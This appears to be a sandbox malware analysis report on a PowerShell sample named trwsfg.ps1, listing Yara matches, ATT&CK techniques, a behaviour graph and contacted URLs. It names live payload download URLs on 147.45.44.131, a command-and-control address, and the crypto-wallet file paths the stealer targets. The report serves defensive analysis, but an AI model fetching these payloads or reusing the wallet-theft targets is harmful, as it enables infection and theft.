            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: Yara matchFile source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7976, type: MEMORYSTR
            Source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: MSASCui.exe
            Source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: procexp.exe
            Source: RegAsm.exe, 00000008.00000002.4149072084.0000000005651000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7976, type: MEMORYSTR
            Source: Yara matchFile source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7976, type: MEMORYSTR
            Source: Yara matchFile source: 00000008.00000002.4131974339.000000000318B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7976, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR
            Source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum#\Electrum\wallets
            Source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \bytecoinJaxxk\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
            Source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus+\Exodus\exodus.wallet
            Source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
            Source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: exodus
            Source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
            Source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Coinomi1\Coinomi\Coinomi\wallets
            Source: powershell.exe, 00000000.00000002.1730309804.00007FFD9BA70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
            Source: Yara matchFile source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7976, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7976, type: MEMORYSTR
            Source: Yara matchFile source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7976, type: MEMORYSTR
            Source: Yara matchFile source: 00000008.00000002.4131974339.000000000318B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7976, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting
            Valid Accounts131
            Windows Management Instrumentation
            1
            Scripting
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            OS Credential Dumping2
            File and Directory Discovery
            Remote Services11
            Archive Collected Data
            11
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API
            1
            DLL Side-Loading
            312
            Process Injection
            1
            Deobfuscate/Decode Files or Information
            LSASS Memory24
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Exploitation for Client Execution
            1
            Scheduled Task/Job
            1
            Scheduled Task/Job
            111
            Obfuscated Files or Information
            Security Account Manager251
            Security Software Discovery
            SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            Scheduled Task/Job
            2
            Registry Run Keys / Startup Folder
            2
            Registry Run Keys / Startup Folder
            1
            Software Packing
            NTDS2
            Process Discovery
            Distributed Component Object ModelInput Capture1
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud Accounts2
            PowerShell
            Network Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets171
            Virtualization/Sandbox Evasion
            SSHKeylogging21
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Masquerading
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items171
            Virtualization/Sandbox Evasion
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job312
            Process Injection
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1582969 Sample: trwsfg.ps1 Startdate: 01/01/2025 Architecture: WINDOWS Score: 100 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 19 other signatures 2->56 9 powershell.exe 14 21 2->9         started        process3 dnsIp4 46 147.45.44.131, 49730, 49731, 49732 FREE-NET-ASFREEnetEU Russian Federation 9->46 40 C:\Windows\Temp\Modules.bat, Unicode 9->40 dropped 42 C:\Users\user\AppData\...\DeleteApp.url, MS 9->42 dropped 68 Found many strings related to Crypto-Wallets (likely being stolen) 9->68 70 Suspicious execution chain found 9->70 72 Found suspicious powershell code related to unpacking or dynamic code loading 9->72 74 Compiles code for process injection (via .Net compiler) 9->74 14 cmd.exe 1 9->14         started        17 conhost.exe 9->17         started        file5 signatures6 process7 signatures8 76 Suspicious powershell command line found 14->76 78 Bypasses PowerShell execution policy 14->78 19 powershell.exe 35 14->19         started        23 cmd.exe 1 14->23         started        process9 file10 36 C:\Users\user\AppData\...\03bjtjx4.cmdline, Unicode 19->36 dropped 38 C:\Users\user\AppData\Local\...\03bjtjx4.0.cs, Unicode 19->38 dropped 58 Found many strings related to Crypto-Wallets (likely being stolen) 19->58 60 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 19->60 62 Writes to foreign memory regions 19->62 64 Injects a PE file into a foreign processes 19->64 25 RegAsm.exe 1 3 19->25         started        29 csc.exe 3 19->29         started        32 curl.exe 1 23->32         started        signatures11 process12 dnsIp13 48 157.20.182.177, 4449, 49733 FCNUniversityPublicCorporationOsakaJP unknown 25->48 66 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 25->66 44 C:\Users\user\AppData\Local\...\03bjtjx4.dll, PE32 29->44 dropped 34 cvtres.exe 1 29->34         started        file14 signatures15 process16

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            trwsfg.ps111%VirustotalBrowse
            trwsfg.ps121%ReversingLabsScript-PowerShell.Trojan.Heuristic
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.dll100%AviraHEUR/AGEN.1300034
            C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.dll100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://147.45.44.131/infopage/vfrcxq.ps1$0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/vfrcxq.ps10%Avira URL Cloudsafe
            http://147.45.44.131/infopage/vfrcxq.ps1USERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAM0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/vfrcxq.ps1n0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/vfrcxq.ps1v0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/vfrcxq.ps1urlrc0%Avira URL Cloudsafe
            http://147.45.H0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/vfrcxq.ps1Dt0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/vfrcxq.ps1t0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/gqub.bat0%Avira URL Cloudsafe
            http://147.45.S0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/yijth.exeF0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/vfrcxq.ps1phlpapi.dll0%Avira URL Cloudsafe
            http://www.newtonsoft.com/jsonschema0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/yijth.exe0%Avira URL Cloudsafe
            http://147.45.d0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/v0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/vm0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/vfrcxq.ps1urlrc60%Avira URL Cloudsafe
            http://147.45.44.131/infopage/vfdjo.exe0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/vfrcxq.ps1me0%Avira URL Cloudsafe
            http://147.45.440%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            bg.microsoft.map.fastly.net
            199.232.214.172
            truefalse
              high
              NameMaliciousAntivirus DetectionReputation
              http://147.45.44.131/infopage/gqub.batfalse
              • Avira URL Cloud: safe
              unknown
              http://147.45.44.131/infopage/vfrcxq.ps1false
              • Avira URL Cloud: safe
              unknown
              http://147.45.44.131/infopage/vfdjo.exefalse
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://147.45.44.131/infopage/vfrcxq.ps1DtRegAsm.exe, 00000008.00000002.4149072084.0000000005570000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1691372852.0000020101BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1718918139.00000201101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1718918139.0000020110074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://147.45.44.131/infopage/vfrcxq.ps1$RegAsm.exe, 00000008.00000002.4128014946.00000000012AB000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1800480910.00000277AD36E000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://147.45.Hpowershell.exe, 00000004.00000002.1800480910.00000277AEF98000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1800480910.00000277AD36E000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://go.micropowershell.exe, 00000000.00000002.1691372852.0000020100C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800480910.00000277AE044000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://147.45.44.131/infopage/vfrcxq.ps1USERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAMRegAsm.exe, 00000008.00000002.4130529842.0000000001560000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://147.45.44.131/infopage/vfrcxq.ps1ncurl.exe, 00000005.00000002.1697801722.000002870BD89000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://discordapp.com/api/v6/users/RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/Licensepowershell.exe, 00000004.00000002.1859609945.00000277BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://contoso.com/Iconpowershell.exe, 00000004.00000002.1859609945.00000277BD142000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://147.45.44.131/infopage/vfrcxq.ps1userdomain=user-PCuserdomain_roamingprofile=user-PCusernamcvtres.exe, 00000007.00000002.1725482794.000001EFAC3D0000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000007.00000002.1725516419.000001EFAC3F0000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://147.45.44.131/infopage/vfrcxq.ps1urlrccurl.exe, 00000005.00000002.1697801722.000002870BD89000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://147.45.44.131/infopage/vfrcxq.ps1vcurl.exe, 00000005.00000002.1697801722.000002870BD89000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://147.45.44.131/infopage/vfrcxq.ps1tcsc.exe, 00000006.00000002.1728658572.000001CEA7F29000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1800480910.00000277AD36E000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://urn.to/r/sds_seeaCouldpowershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                  high
                                  http://james.newtonking.com/projects/jsonRegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                    high
                                    http://147.45.SRegAsm.exe, 00000008.00000002.4131244928.0000000001730000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.newtonsoft.com/jsonschemapowershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://147.45.44.131powershell.exe, 00000000.00000002.1691372852.0000020101782000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800480910.00000277AEED0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800480910.00000277AD36E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800480910.00000277AEFB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://147.45.44.131/infopage/yijth.exepowershell.exe, 00000004.00000002.1800480910.00000277AEFB4000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000006.00000003.1725747663.000001CEA7FA6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000003.1727521083.000001CEA814B000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 00000006.00000003.1725855115.000001CEA7FB7000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000003.1725667893.000001CEA7FC9000.00000004.00000020.00020000.00000000.sdmp, 03bjtjx4.0.cs.4.dr, 03bjtjx4.dll.6.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://stackoverflow.com/q/14436606/23354cItpowershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                        high
                                        http://147.45.44.131/infopage/vfrcxq.ps1phlpapi.dllcurl.exe, 00000005.00000002.1697801722.000002870BD97000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1697656938.000002870BD94000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://ipinfo.io/ippowershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                          high
